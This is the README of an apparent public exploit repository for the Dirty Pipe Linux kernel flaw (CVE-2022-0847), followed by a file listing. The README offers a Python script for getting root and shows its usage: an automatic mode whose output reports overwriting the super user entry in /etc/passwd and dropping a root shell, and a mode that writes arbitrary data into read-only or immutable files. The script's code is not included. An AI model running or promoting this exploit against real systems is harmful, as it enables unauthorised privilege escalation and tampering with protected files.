CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.# Dirty Pipe automatic root exploit (CVE-2022-0847)

## Dependencies:
- **Python 3.10 or above**
## How to use:
### Automatic root:
```
$ python3.10 dirtyPipe.py -a
[+] hjacking super user in /etc/passwd
[+] dropipng shell
#
```
### Write a no write permission, immutable or read-only mounted file:
```
$ python3.10 dirtyPipe.py -w FILE OFFSET DATA
```
#### An oferring from [**@terabitSec 🦜**](https://t.me/terabitSec).
[4.0K] /data/pocs/dd7bc9aa10e8ea8f48d734dab35b8637b19e385b
├── [4.0K] assets
│ └── [3.4M] poc.gif
├── [2.7K] dirtyPipe.py
├── [ 34K] LICENSE
└── [ 453] README.md
1 directory, 4 files